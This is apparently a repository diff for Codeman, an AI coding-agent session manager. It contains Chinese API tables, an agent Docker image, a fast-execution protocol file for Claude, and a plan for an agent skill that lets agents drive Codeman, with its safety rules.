| `POST` | `/api/sessions/:id/input` | 发送输入 |
|
||||
|
||||
| 方法 | 端点 | 说明 |
|
||||
| -------- | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------------- |
|
||||
| `GET` | `/api/sessions` | 列出全部 |
|
||||
| `POST` | `/api/quick-start` | 创建 case + 启动会话(`{caseName?, mode?, effort?, envOverrides?}`) |
|
||||
| `POST` | `/api/sessions/:id/input` | 发送输入(`{input, useMux?, clientId?, seq?, wait?, waitTimeout?}`:`clientId`+`seq` = 精确一次;`wait` 阻塞到这一回合结束) |
|
||||
| `GET` | `/api/sessions/:id/terminal` | 读取终端输出(`?tail=<bytes>`、`?full=1`):交互式会话的读取路径 |
|
||||
| `GET` | `/api/sessions/:id/output` | 一次性的解析输出(tmux 承载的会话里 `textOutput` 为空) |
|
||||
| `GET` | `/api/sessions/:id/wait` | 阻塞到某个信号触发(`?until=stop,idle,exit&timeout=&fresh=`);超时是 `200` |
|
||||
| `GET` | `/api/sessions/:id/wait-output` | 阻塞到某个字面串出现(`?match=&nocase=&from=now\|buffer&timeout=`) |
|
||||
| `GET` | `/api/sessions/unified` | 统一的活动 + 历史清单(会话管理器):`?q=&limit=` |
|
||||
| `POST` | `/api/sessions/:id/pin` | 在会话管理器中置顶 / 取消置顶(`{pinned}`) |
|
||||
| `PUT` | `/api/session-order` | 跨设备同步标签顺序(`{order: [ids]}`) |
|
||||
| `DELETE` | `/api/sessions/:id` | 删除会话 |
|
||||
|
||||
### 重生(Respawn)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | 启用,带配置与定时器 |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | 停止控制器 |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | 更新配置 |
|
||||
|
||||
### Ralph / Todo
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/sessions/:id/ralph-state` | 获取循环状态 + todos |
|
||||
| `POST` | `/api/sessions/:id/ralph-config` | 配置跟踪 |
|
||||
| 方法 | 端点 | 说明 |
|
||||
| ------ | ---------------------------------- | -------------------- |
|
||||
| `POST` | `/api/sessions/:id/respawn/enable` | 启用,带配置与定时器 |
|
||||
| `POST` | `/api/sessions/:id/respawn/stop` | 停止控制器 |
|
||||
| `PUT` | `/api/sessions/:id/respawn/config` | 更新配置 |
|
||||
|
||||
### 编排器(Orchestrator)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `POST` | `/api/orchestrator/start` | 从目标启动编排 |
|
||||
| `POST` | `/api/orchestrator/approve` | 批准生成的计划 |
|
||||
| `GET` | `/api/orchestrator/status` | 当前阶段 + 进度 |
|
||||
| `POST` | `/api/orchestrator/stop` | 停止并清理 |
|
||||
|
||||
| 方法 | 端点 | 说明 |
|
||||
| ------ | --------------------------- | --------------- |
|
||||
| `POST` | `/api/orchestrator/start` | 从目标启动编排 |
|
||||
| `POST` | `/api/orchestrator/approve` | 批准生成的计划 |
|
||||
| `GET` | `/api/orchestrator/status` | 当前阶段 + 进度 |
|
||||
| `POST` | `/api/orchestrator/stop` | 停止并清理 |
|
||||
|
||||
### Cron(定时任务)
|
||||
|
||||
| 方法 | 端点 | 说明 |
|
||||
| ---------------- | ---------------------------- | --------------------- |
|
||||
| `GET` / `POST` | `/api/cron/jobs` | 列出 / 创建 cron 任务 |
|
||||
| `PUT` / `DELETE` | `/api/cron/jobs/:id` | 更新 / 删除任务 |
|
||||
| `PUT` | `/api/cron/jobs/:id/enabled` | 启用 / 禁用 |
|
||||
| `POST` | `/api/cron/jobs/:id/run` | 立即运行 |
|
||||
| `GET` | `/api/cron/jobs/:id/runs` | 运行历史 |
|
||||
|
||||
### 子智能体(Subagents)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/subagents` | 列出所有后台智能体 |
|
||||
| `GET` | `/api/subagents/:id` | 智能体信息与状态 |
|
||||
| `GET` | `/api/subagents/:id/transcript` | 完整活动记录 |
|
||||
| `DELETE` | `/api/subagents/:id` | 杀掉智能体进程 |
|
||||
|
||||
| 方法 | 端点 | 说明 |
|
||||
| -------- | ------------------------------- | ------------------ |
|
||||
| `GET` | `/api/subagents` | 列出所有后台智能体 |
|
||||
| `GET` | `/api/subagents/:id` | 智能体信息与状态 |
|
||||
| `GET` | `/api/subagents/:id/transcript` | 完整活动记录 |
|
||||
| `DELETE` | `/api/subagents/:id` | 杀掉智能体进程 |
|
||||
|
||||
### 系统(System)
|
||||
| 方法 | 端点 | 说明 |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | `/api/events` | SSE 流 |
|
||||
| `GET` | `/api/status` | 完整应用状态 |
|
||||
| `POST` | `/api/hook-event` | Hook 回调 |
|
||||
| `GET` | `/api/system/update/check` | 检查新发行版 |
|
||||
| `POST` | `/api/system/update` | 自更新(git-clone 安装) |
|
||||
| `POST` | `/api/clipboard` | 把文本推送到所有已连接浏览器(`{text}`) |
|
||||
| `GET` | `/api/sessions/:id/run-summary` | 时间线 + 统计 |
|
||||
|
||||
| 方法 | 端点 | 说明 |
|
||||
| ------ | ------------------------------- | ---------------------------------------- |
|
||||
| `GET` | `/api/events` | SSE 流 |
|
||||
| `GET` | `/api/status` | 完整应用状态 |
|
||||
| `POST` | `/api/hook-event` | Hook 回调 |
|
||||
| `GET` | `/api/system/update/check` | 检查新发行版 |
|
||||
| `POST` | `/api/system/update` | 自更新(git-clone 安装) |
|
||||
| `POST` | `/api/clipboard` | 把文本推送到所有已连接浏览器(`{text}`) |
|
||||
| `GET` | `/api/sessions/:id/run-summary` | 时间线 + 统计 |
|
||||
|
||||
> **想在 Codeman 之上做集成?**[`docs/extending-codeman.md`](docs/extending-codeman.md)(英文)是集成指南:把你自己的界面作为标签页嵌入、订阅 SSE 事件流以便在 agent 需要你时做出响应、用脚本驱动 Codeman,以及动手前值得先了解的那些坑。Codeman 刻意不提供插件运行时,所以一个集成就是你自己的进程在讲 HTTP。
|
||||
|
||||
---
|
||||
|
||||
@@ -571,7 +896,6 @@ flowchart TB
|
||||
end
|
||||
|
||||
subgraph Detection["检测层"]
|
||||
RT["Ralph 跟踪器"]
|
||||
SW["子智能体监视器<br/><small>~/.claude/projects/*/subagents</small>"]
|
||||
TW["团队监视器<br/><small>~/.claude/teams/*</small>"]
|
||||
end
|
||||
@@ -582,7 +906,7 @@ flowchart TB
|
||||
end
|
||||
|
||||
subgraph External["外部"]
|
||||
CLI["AI CLI<br/><small>Claude Code / OpenCode / Codex</small>"]
|
||||
CLI["AI CLI<br/><small>Claude Code / OpenCode / Codex / Antigravity / Gemini</small>"]
|
||||
BG["后台智能体<br/><small>(Task 工具)</small>"]
|
||||
end
|
||||
end
|
||||
@@ -595,7 +919,6 @@ flowchart TB
|
||||
SM --> RC
|
||||
SM --> ORC
|
||||
SM --> SS
|
||||
S1 --> RT
|
||||
S1 --> SCR
|
||||
S2 --> SCR
|
||||
RC --> SCR
|
||||
@@ -614,7 +937,7 @@ flowchart TB
|
||||
npm install
|
||||
npx tsx src/index.ts web # 开发模式
|
||||
npm run build # 生产构建
|
||||
npm test # 运行测试
|
||||
npm run test:ci # 运行测试(CI 套件;浏览器套件需要额外环境)
|
||||
```
|
||||
|
||||
完整文档见 [CLAUDE.md](./CLAUDE.md)。
|
||||
@@ -625,14 +948,14 @@ npm test # 运行测试
|
||||
|
||||
本代码库经历了一次全面的 7 阶段重构,消除了上帝对象、集中了配置,并建立了模块化架构:
|
||||
|
||||
| 阶段 | 改了什么 | 影响 |
|
||||
|-------|-------------|--------|
|
||||
| **性能** | 缓存端点、SSE 自适应批处理、缓冲区分块 | 终端延迟低于 16ms |
|
||||
| **路由抽取** | `server.ts` 拆分为 15 个领域路由模块 + 认证中间件 + 端口接口 | server.ts 代码量 **−67%**(6,736 → 2,254) |
|
||||
| **领域拆分** | `types.ts` → 16 个领域文件、`ralph-tracker` → 7 个文件、`respawn-controller` → 5 个文件、`session` → 6 个文件 | 不再有上帝文件 |
|
||||
| **前端模块** | `app.js` → 18 个抽取模块,横跨基础设施、领域与特性层 | app.js 核心降至 **约 3.4K 行** |
|
||||
| **配置合并** | 约 70 个散落的魔法数字 → 10 个领域聚焦的配置文件 | 零跨文件重复 |
|
||||
| **测试基础设施** | 共享 mock 库、12 个路由测试文件、统一的 MockSession | 路由处理器可通过 `app.inject()` 测试 |
|
||||
| 阶段 | 改了什么 | 影响 |
|
||||
| ---------------- | ------------------------------------------------------------------------------------------------------------- | ------------------------------------------ |
|
||||
| **性能** | 缓存端点、SSE 自适应批处理、缓冲区分块 | 终端延迟低于 16ms |
|
||||
| **路由抽取** | `server.ts` 拆分为 15 个领域路由模块 + 认证中间件 + 端口接口 | server.ts 代码量 **−67%**(6,736 → 2,254) |
|
||||
| **领域拆分** | `types.ts` → 16 个领域文件、`ralph-tracker` → 7 个文件、`respawn-controller` → 5 个文件、`session` → 6 个文件 | 不再有上帝文件 |
|
||||
| **前端模块** | `app.js` → 18 个抽取模块,横跨基础设施、领域与特性层 | app.js 核心降至 **约 3.4K 行** |
|
||||
| **配置合并** | 约 70 个散落的魔法数字 → 10 个领域聚焦的配置文件 | 零跨文件重复 |
|
||||
| **测试基础设施** | 共享 mock 库、12 个路由测试文件、统一的 MockSession | 路由处理器可通过 `app.inject()` 测试 |
|
||||
|
||||
完整细节:[`docs/archive/code-structure-findings.md`](docs/archive/code-structure-findings.md)
|
||||
|
||||
@@ -654,6 +977,10 @@ npm install xterm-zerolag-input
|
||||
|
||||
---
|
||||
|
||||
## 版本策略
|
||||
|
||||
Codeman 遵循 [SemVer](https://semver.org/)。版本号真正承诺的内容,以及哪些算内部实现(HTTP/SSE API、磁盘上的状态、实验性特性),都写在 [`docs/versioning-policy.md`](docs/versioning-policy.md) 中。如果你的脚本依赖 HTTP API,请锁定到确切版本。
|
||||
|
||||
## 许可证
|
||||
|
||||
MIT —— 见 [LICENSE](LICENSE)
|
||||
|
||||
@@ -24,6 +24,8 @@ export default defineConfig({
|
||||
'test/inline-rename.test.ts', // browser (Playwright)
|
||||
'test/opencode-resize.test.ts', // browser (Playwright)
|
||||
'test/webgl-fallback.test.ts', // browser (Playwright)
|
||||
'test/terminal-copy-shortcut.test.ts', // browser (Playwright)
|
||||
'test/codex-predictive-echo.test.ts', // browser (Playwright) + real codex binary
|
||||
],
|
||||
setupFiles: ['./test/setup.ts'],
|
||||
fileParallelism: false,
|
||||
|
||||
@@ -0,0 +1,75 @@
|
||||
# Codeman agent base image (built locally by scripts/build-agent-image.mjs).
|
||||
#
|
||||
# Contains the agent toolchain (node + the CLIs + git/tmux/ripgrep) but NO
|
||||
# secrets: credentials are delivered at RUNTIME via bind mounts (~/.claude etc.)
|
||||
# or name-only `docker exec --env`, never baked in, so `docker save` exports stay
|
||||
# secret-free. tmux is a HARD prerequisite (the in-container tmux is what makes a
|
||||
# reconnect durable), so it is installed here and probed before launch.
|
||||
#
|
||||
# HOME is made writable by an ARBITRARY host uid via the OpenShift "gid 0,
|
||||
# group-writable" convention: on Linux we run `--user <hostUid>:0`, so the agent
|
||||
# uid is the host uid (workspace files stay host-owned) while gid 0 keeps $HOME
|
||||
# writable even though the uid is not the baked 1000.
|
||||
FROM node:22-bookworm-slim
|
||||
|
||||
# Base toolchain. `curl` is needed for the hook callbacks (`curl -sk $CODEMAN_API_URL`),
|
||||
# `procps` for `ps`, `tmux` for the durable in-container session.
|
||||
RUN apt-get update \
|
||||
&& apt-get install -y --no-install-recommends \
|
||||
git \
|
||||
tmux \
|
||||
ripgrep \
|
||||
curl \
|
||||
ca-certificates \
|
||||
less \
|
||||
procps \
|
||||
openssh-client \
|
||||
&& rm -rf /var/lib/apt/lists/*
|
||||
|
||||
# The npm-published agent CLIs. Pinning is left to the rebuild cadence (see
|
||||
# docs/docker-cases-plan.md, user-decision 2).
|
||||
RUN npm install -g \
|
||||
@anthropic-ai/claude-code \
|
||||
@openai/codex \
|
||||
@google/gemini-cli \
|
||||
opencode-ai \
|
||||
&& npm cache clean --force
|
||||
|
||||
# Antigravity (`agy`) is NOT on npm — Google ships a standalone binary through its
|
||||
# own installer, so it needs its own step. `--dir /usr/local/bin` is load-bearing:
|
||||
# the installer's default target is `$HOME/.local/bin`, which at build time is
|
||||
# root's home and would be unreachable by the `agent` user the container runs as.
|
||||
# ⚠️ This binary is ~190MB on its own; it is the single largest layer in the image.
|
||||
RUN curl -fsSL https://antigravity.google/cli/install.sh | bash -s -- --dir /usr/local/bin \
|
||||
&& chmod 755 /usr/local/bin/agy \
|
||||
&& agy --version
|
||||
|
||||
# `agent` user (gid 0) with an arbitrary-uid-writable HOME. The uid is
|
||||
# auto-assigned (node:22-slim already occupies uid 1000 with its `node` user); at
|
||||
# runtime Codeman overrides with `--user <hostUid>:0` on Linux, so the baked uid
|
||||
# only matters for a hand-run / Docker Desktop container. gid 0 + group-writable
|
||||
# HOME (OpenShift arbitrary-uid convention) keeps $HOME writable for any uid.
|
||||
# UTF-8 locale so tmux/Ink render Unicode box-drawing instead of VT100 ACS `q`
|
||||
# glyphs (C.UTF-8 is built into glibc; no locales package needed). Codeman also
|
||||
# sets these at run time so containers built before this line still get UTF-8.
|
||||
ENV LANG=C.UTF-8 LC_ALL=C.UTF-8
|
||||
ENV HOME=/home/agent
|
||||
# `.claude` (+ `.claude/projects` mount point) and `.codex` (+ `.codex/sessions`) are
|
||||
# pre-created gid-0 group-writable so the container owns its OWN credential config
|
||||
# dirs: tokens/settings/config are seeded in as writable copies and each CLI's runtime
|
||||
# state (backups, tasks, refreshed tokens) stays container-local, while ONLY the shared
|
||||
# transcript/rollout dirs (`.claude/projects`, `.codex/sessions`) are bind-mounted from
|
||||
# the host. (gemini/gcloud/opencode are whole seed-copies and need no pre-created dir;
|
||||
# Antigravity nests its state inside `.gemini/antigravity-cli`, so it rides that seed.)
|
||||
RUN useradd -g 0 -m -d /home/agent -s /bin/bash agent \
|
||||
&& mkdir -p /home/agent/.npm /home/agent/.cache /home/agent/.config /home/agent/.codeman \
|
||||
/home/agent/.claude/projects /home/agent/.codex/sessions \
|
||||
&& chgrp -R 0 /home/agent \
|
||||
&& chmod -R g=u /home/agent
|
||||
|
||||
USER agent
|
||||
WORKDIR /home/agent
|
||||
|
||||
# Codeman overrides the command with `sleep infinity` at create time; this is the
|
||||
# fallback so a hand-run container also idles rather than exiting.
|
||||
CMD ["sleep", "infinity"]
|
||||
@@ -0,0 +1,104 @@
|
||||
# SPEEDRUN.md — Fast-execution protocol for Claude
|
||||
|
||||
Read this when the goal is **throughput**: get correct, verified work done with
|
||||
minimum ceremony. This does **not** relax correctness or the safety rules in
|
||||
`CLAUDE.md` — those still win. It removes _waste_, not _rigor_.
|
||||
|
||||
> Precedence: `CLAUDE.md` > explicit user instructions > this file. If anything
|
||||
> here conflicts with `CLAUDE.md`, `CLAUDE.md` wins.
|
||||
|
||||
---
|
||||
|
||||
## The mindset
|
||||
|
||||
- **Act, don't announce.** No "I'm going to now…" preamble. Do the thing, report
|
||||
the result.
|
||||
- **Cheapest proof that the change works.** Pick the smallest check that actually
|
||||
demonstrates correctness — not the biggest.
|
||||
- **Batch aggressively.** Independent reads, greps, and edits go in **one**
|
||||
message with parallel tool calls. Never serialize work that has no dependency.
|
||||
- **Momentum over perfection.** Land a correct increment, verify it, move on.
|
||||
Don't gold-plate untouched code.
|
||||
|
||||
---
|
||||
|
||||
## Loop (repeat until done)
|
||||
|
||||
1. **Orient once** — one parallel burst of reads/greps to load the context you
|
||||
need. Don't re-read files the harness says are already current.
|
||||
2. **Change** — make the edit(s). Batch independent edits.
|
||||
3. **Verify cheaply** — the smallest check that proves _this_ change (see below).
|
||||
4. **Advance** — next item. Only re-verify what you touched.
|
||||
5. **Stop** at: list empty, a hard blocker, or a decision that's genuinely the
|
||||
user's to make.
|
||||
|
||||
---
|
||||
|
||||
## Verification ladder — climb only as high as the change needs
|
||||
|
||||
| Change kind | Cheapest sufficient check |
|
||||
|-------------|---------------------------|
|
||||
| Types / signatures / imports | `tsc --noEmit` (or `--watch` already running) |
|
||||
| One module's logic | `npm test -- test/<file>.test.ts` (the **one** relevant file) |
|
||||
| A named behavior | `npm test -- -t "pattern"` |
|
||||
| Route/handler | `app.inject()` route test, or one `curl` against the running dev server |
|
||||
| Frontend render | Playwright load + assert (`waitUntil: 'domcontentloaded'`, wait 3–4s) |
|
||||
| Broad / pre-merge | `npm run test:ci` (the CI-equivalent sweep) |
|
||||
|
||||
**Hard rules (never skip, even in a rush):**
|
||||
- ⚠️ **Never run bare `npm test`** — it pulls in browser/visual suites that hang
|
||||
or fail locally. Always pass a file or `-t`, or use `test:ci`.
|
||||
- ⚠️ **Never COM without verifying the change actually works** first (curl the
|
||||
endpoint / Playwright the UI). "Compiles" ≠ "works".
|
||||
- ⚠️ **Session safety** — check `$CODEMAN_MUX`; never `tmux kill-session` /
|
||||
`pkill claude` in a managed session.
|
||||
- ⚠️ **Single-line prompts** for any programmatic session input.
|
||||
|
||||
---
|
||||
|
||||
## Speed tactics that pay off here
|
||||
|
||||
- **Parallel exploration**: dispatch `Explore` subagents (or one parallel grep
|
||||
burst) instead of serial file-by-file reading when scope is uncertain.
|
||||
- **`tsc --noEmit --watch`** in the background — instant type feedback, no repeat
|
||||
cold starts.
|
||||
- **Target one test file** — `fileParallelism: false` means the suite is serial;
|
||||
running one file is dramatically faster than the sweep.
|
||||
- **`curl localhost:3000/api/...`** beats spinning up a browser for backend
|
||||
checks. Reserve Playwright for actual UI rendering.
|
||||
- **Trust the harness** — if it says a file you just edited is current, don't
|
||||
re-Read it to "confirm". The Edit already succeeded or it would have errored.
|
||||
|
||||
---
|
||||
|
||||
## Anti-patterns (these masquerade as speed, but cost time)
|
||||
|
||||
- Running the full test suite to check a one-file change.
|
||||
- Re-reading files you already have in context.
|
||||
- Narrating a plan you're about to execute anyway.
|
||||
- Serial tool calls that have no dependency between them.
|
||||
- Claiming "done / fixed / passing" **before** running the check that proves it.
|
||||
- Deploying (COM) on green typecheck alone, without exercising the real flow.
|
||||
|
||||
---
|
||||
|
||||
## Stop-conditions (don't rush past these)
|
||||
|
||||
Stop and surface, don't guess, when you hit:
|
||||
- A **destructive / hard-to-reverse** action (delete, overwrite, force-push).
|
||||
- An **outward-facing** action (publishing, sending, deploying) not already
|
||||
authorized.
|
||||
- A **genuine product decision** the code can't answer.
|
||||
- A **failing verification you can't explain** — debug it (see
|
||||
`superpowers:systematic-debugging`), don't paper over it.
|
||||
|
||||
---
|
||||
|
||||
## Definition of done
|
||||
|
||||
A task is done when **all** hold:
|
||||
- The change is made.
|
||||
- The cheapest sufficient check **ran** and **passed** — evidence, not assertion.
|
||||
- No new type errors / lint errors introduced (`tsc --noEmit`, `npm run lint`).
|
||||
- You state plainly what was done and what proved it. If a step was skipped or a
|
||||
test failed, say so — don't hedge, don't overclaim.
|
||||
@@ -0,0 +1,759 @@
|
||||
# Agent Control Plan: skill packaging + wait primitives
|
||||
|
||||
**Status**: steps 1 to 8 DONE and RELEASED. The wait primitives and the skill itself
|
||||
(steps 1 to 5) shipped in **1.13.0**; the `codeman skill install` CLI, per-case injection
|
||||
and `agentSkillEnabled` (step 6) shipped in **1.14.1** and were republished with fixes in
|
||||
**1.14.2**. Steps 1 to 5 were multi-round verified on 2026-08-08, step 6 on 2026-08-09;
|
||||
see [§7 Build log](#7-build-log-what-actually-happened) for what shipped, what each
|
||||
verification round found, and the two items that genuinely remain open (§2.4's footgun
|
||||
guard and the Part 3 deferrals).
|
||||
|
||||
**Date**: 2026-08-08
|
||||
**Scope**: Part 1 (agent skill) and Part 2 (wait primitives) were specified and built.
|
||||
Parts 3 to 5 are captured so they are not lost, but remain deliberately deferred.
|
||||
|
||||
---
|
||||
|
||||
## 0. Where this came from: what herdr does
|
||||
|
||||
[herdr](https://github.com/herdrdev/herdr) (Rust, Apache-2.0, ~25.8k stars) is a terminal
|
||||
multiplexer built around AI coding agents. Relevant findings from the research pass:
|
||||
|
||||
| Capability | How herdr does it |
|
||||
| --------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Agent state | Four states (`idle`, `working`, `blocked`, `done`) that roll up pane to tab to workspace in a sidebar |
|
||||
| Detection | Lifecycle hooks where the agent supports them (it names Pi and MastraCode), otherwise TOML manifests matched against a live bottom-buffer snapshot. Bundled manifests plus remote updates from herdr.dev, local overrides win |
|
||||
| Control API | Newline-delimited JSON over a Unix socket (`~/.config/herdr/sessions/<name>/herdr.sock`), `{"id":"req_1","method":"pane.split","params":{}}`, dot-notation methods, plus long-lived event subscriptions |
|
||||
| Discoverability | `herdr api schema` prints a machine-readable schema |
|
||||
| Agent skill | `npx skills add herdrdev/herdr --skill herdr -g`, a SKILL.md wrapping the CLI, guarded by `test "${HERDR_ENV:-}" = 1` so an agent outside a herdr pane refuses to act |
|
||||
| Persistence | Background server, detach with `ctrl+b q`, snapshot restore of workspaces/tabs/panes/cwd/layout, experimental screen-history replay, agent resume via native session ids, live PTY handoff across server replacement |
|
||||
| Plugins | `herdr-plugin.toml` manifest, actions, event hooks, plugin panes, link handlers, GitHub-topic marketplace index |
|
||||
|
||||
The commands the skill teaches the agent:
|
||||
|
||||
| Group | Commands |
|
||||
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| workspace | `workspace list`, `workspace create` |
|
||||
| tab | `tab list --workspace <id>`, `tab create` |
|
||||
| pane | `pane current`, `pane list`, `pane layout`, `pane split --current --direction right --cwd <path> --no-focus`, `pane run <id> "<cmd>"`, `pane wait-output <id> --match/--regex <p> --timeout <ms>`, `pane read <id> --source visible\|recent\|detection` |
|
||||
| agent | `agent list`, `agent start <name> --kind <type> --pane <id>`, `agent prompt <name> "<text>" --wait --timeout <ms>`, `agent wait <name> --until <state> --timeout <ms>`, `agent send-keys`, `agent get`, `agent read` |
|
||||
|
||||
### The honest comparison
|
||||
|
||||
herdr and Codeman are not the same product. herdr is a local, keyboard-first multiplexer with
|
||||
no server, no web UI, and no autonomy layer. Codeman is a server with a browser and mobile UI,
|
||||
remote and Docker cases, respawn, Ralph, cron, and the orchestrator, none of which herdr has.
|
||||
|
||||
What herdr genuinely does better is being **callable by the agent running inside it**. For
|
||||
Codeman that is a packaging problem plus one missing primitive, not an architecture problem.
|
||||
|
||||
---
|
||||
|
||||
## 1. Gap analysis
|
||||
|
||||
| herdr capability | Codeman equivalent today | Gap |
|
||||
| ---------------------------- | ------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------- |
|
||||
| `pane split` + `agent start` | `POST /api/quick-start`, `POST /api/sessions` | none, already there |
|
||||
| `agent prompt` | `POST /api/sessions/:id/input` with `clientId`+`seq` exactly-once | no `--wait` |
|
||||
| `pane read` | `GET /api/sessions/:id/output`, `GET /api/sessions/:id/terminal?full=1` | none |
|
||||
| `agent list` / `agent get` | `GET /api/sessions`, `GET /api/sessions/unified`, `GET /api/status` | none |
|
||||
| `agent wait --until <state>` | SSE only (`/api/events`) | **missing**, and SSE is impractical from a shell tool |
|
||||
| `pane wait-output --match` | nothing | **missing** |
|
||||
| Skill file | README section "Driving Codeman from an Agent" | **not packaged**, an agent will never find it |
|
||||
| Env guard `HERDR_ENV=1` | `CODEMAN_MUX=1`, `CODEMAN_API_URL`, `CODEMAN_SESSION_ID` already exported at spawn | none, the guard variables exist |
|
||||
| `blocked` state | hook events (`permission_prompt`, `elicitation_dialog`) plus CSS classes plus the phone overview NEEDS YOU section | not in the wire contract (`SessionStatus = 'idle' \| 'busy' \| 'stopped' \| 'error'`) |
|
||||
| `api schema` | hand-written `docs/api-reference.md` | no machine-readable schema |
|
||||
| Detection manifests | hardcoded in `usage-limit-patterns.ts`, `respawn-*-patterns`, `regex-patterns.ts` | patterns are code, not data |
|
||||
| Plugin runtime | deliberately refused, see `docs/extending-codeman.md` | not a gap, a decision |
|
||||
| Session handoff on restart | tmux owns the PTYs, so they already survive a Codeman restart | not a gap, solved by architecture |
|
||||
|
||||
**Conclusion**: roughly 90% of the capability surface already exists. Parts 1 and 2 below close
|
||||
the two real gaps.
|
||||
|
||||
The table is the 2026-08-08 snapshot that motivated the work, kept as written. The three rows
|
||||
marked missing are closed since: `GET .../wait` and `GET .../wait-output` shipped in 1.13.0, and
|
||||
the skill is packaged at `skills/codeman` (npm tarball included). `blocked` as a wire-contract
|
||||
state, and the machine-readable schema, are still open (Parts 3 and 4).
|
||||
|
||||
---
|
||||
|
||||
## 2. Part 1: the Codeman agent skill
|
||||
|
||||
### 2.1 Goal
|
||||
|
||||
An agent running inside a Codeman session can discover and correctly drive Codeman without the
|
||||
user pasting API docs into the prompt, and without inventing dangerous calls.
|
||||
|
||||
### 2.2 Layout and distribution
|
||||
|
||||
The `npx skills` CLI (vercel-labs/skills) clones a GitHub repo and looks for
|
||||
`skills/<name>/SKILL.md`. Claude Code natively discovers `.claude/skills/<name>/SKILL.md` in a
|
||||
project and `~/.claude/skills/` globally. Both are satisfied with one source of truth plus a
|
||||
symlink, which is the pattern this repo already uses for `remotion-best-practices`.
|
||||
|
||||
```
|
||||
skills/
|
||||
codeman/
|
||||
SKILL.md <- single source of truth
|
||||
reference/
|
||||
endpoints.md <- full endpoint tables, loaded on demand
|
||||
recipes.md <- worked multi-session orchestration examples
|
||||
.claude/skills/codeman -> ../../skills/codeman (symlink, dogfooding in this repo)
|
||||
```
|
||||
|
||||
Adding a `skills/` directory to the repo root costs one entry in the GitHub listing. CLAUDE.md
|
||||
keeps the root short on purpose, so this needs a conscious sign-off; the alternative is
|
||||
`docs/skills/codeman/` with a `--skill` path argument, which breaks the one-liner install.
|
||||
**Recommendation**: accept `skills/` at the root, because the install one-liner is the whole
|
||||
point of shipping a skill.
|
||||
|
||||
Install paths, in order of how a user gets it:
|
||||
|
||||
1. `npx skills add Ark0N/Codeman --skill codeman -g` (global, any agent, matches the herdr flow).
|
||||
2. `codeman skill install [--global | --case <name>]`, a new CLI subcommand writing the same
|
||||
file. This is the path for users who installed via npm and never cloned the repo.
|
||||
3. **Automatic per-case injection**, modeled exactly on `applyStatusLineConfig(casePath, enabled)`
|
||||
in `hooks-config.ts`: write `<case>/.claude/skills/codeman/SKILL.md` at case creation,
|
||||
gated on a new setting. Codeman already writes `<case>/.claude/settings.local.json` hooks
|
||||
through `writeHooksConfig()`, so this is the same mechanism with the same lifecycle.
|
||||
|
||||
Setting name: `agentSkillEnabled`. Synced (not per-device), since it changes on-disk case
|
||||
content rather than display. Default: **ON after the dogfooding phase, OFF in the first
|
||||
release**. Rationale for starting OFF: Claude Code loads every skill's name and description
|
||||
into context on every turn, so an always-on skill has a small permanent token cost, and we
|
||||
should measure that we are buying something with it first.
|
||||
|
||||
### 2.3 SKILL.md content
|
||||
|
||||
Frontmatter, per the skills convention (`name` + `description` required):
|
||||
|
||||
```yaml
|
||||
---
|
||||
name: codeman
|
||||
description: >-
|
||||
Control Codeman, the session manager this agent is running inside: list sessions,
|
||||
start worker sessions, send prompts, read terminal output, and wait for other agents
|
||||
to finish. Only usable when CODEMAN_MUX=1.
|
||||
---
|
||||
```
|
||||
|
||||
Body sections, in order:
|
||||
|
||||
**1. Guard (first thing, non-negotiable).**
|
||||
|
||||
```bash
|
||||
test "${CODEMAN_MUX:-}" = 1 || { echo "not inside a Codeman session"; exit 1; }
|
||||
API="${CODEMAN_API_URL:?CODEMAN_API_URL not set, refusing to guess}"
|
||||
SELF="${CODEMAN_SESSION_ID:-}"
|
||||
```
|
||||
|
||||
If `CODEMAN_MUX` is not `1`, the agent must stop and say it is not running inside a
|
||||
Codeman-managed session. Same shape as herdr's `HERDR_ENV` guard, and the variables are
|
||||
already exported by `tmux-manager.buildEnvExports()`. No fallback URL when
|
||||
`CODEMAN_API_URL` is unset: any guess is the wrong scheme on an HTTPS install (prod is
|
||||
HTTPS with a self-signed cert, hence `curl -sk` throughout), and a server the agent
|
||||
cannot identify is not one it should be driving.
|
||||
|
||||
**2. Rules of the road.** Lifted and tightened from README lines 666 to 745:
|
||||
|
||||
- Single-line input only. Multi-line breaks the agent TUI (Ink).
|
||||
- Always send `clientId` + a monotonic `seq` on `POST .../input` so a retry cannot double-deliver.
|
||||
- Envelope is `{success, data}`; a few legacy GETs are bare, so read `body.data ?? body`.
|
||||
- Add `-u admin:"$CODEMAN_PASSWORD"` when a password is set. Prod is HTTPS, so `curl -sk`.
|
||||
- Prefer `/api/v1/*`, the stable alias.
|
||||
|
||||
**3. Safety rules (the section that does not exist anywhere today).**
|
||||
|
||||
- Never act on `$CODEMAN_SESSION_ID`. That is you.
|
||||
- Only `DELETE` sessions **you created in this conversation**, by exact id. Keep the list.
|
||||
- Never bulk-delete, never loop a `DELETE` over `/api/sessions`. There is no undo.
|
||||
- Never `tmux kill-session`, `pkill tmux`, `pkill claude`. Use the API.
|
||||
- Creating a session consumes a slot against the 50-session cap. Clean up what you start.
|
||||
|
||||
**4. Recipes**, each one a single copy-pasteable curl:
|
||||
|
||||
| Task | Call |
|
||||
| -------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| list sessions | `GET /api/v1/sessions` |
|
||||
| find yourself | match ids by PREFIX of `$CODEMAN_SESSION_ID` (Docker cases truncate it to 8 chars, so an equality check never fires there) |
|
||||
| start a worker | `POST /api/v1/quick-start {caseName, mode, effort}` |
|
||||
| send a prompt | `POST /api/v1/sessions/:id/input {input:"…\r", useMux:true, clientId, seq}` (the trailing `\r` is what sends Enter; without it the text sits on the prompt unsubmitted) |
|
||||
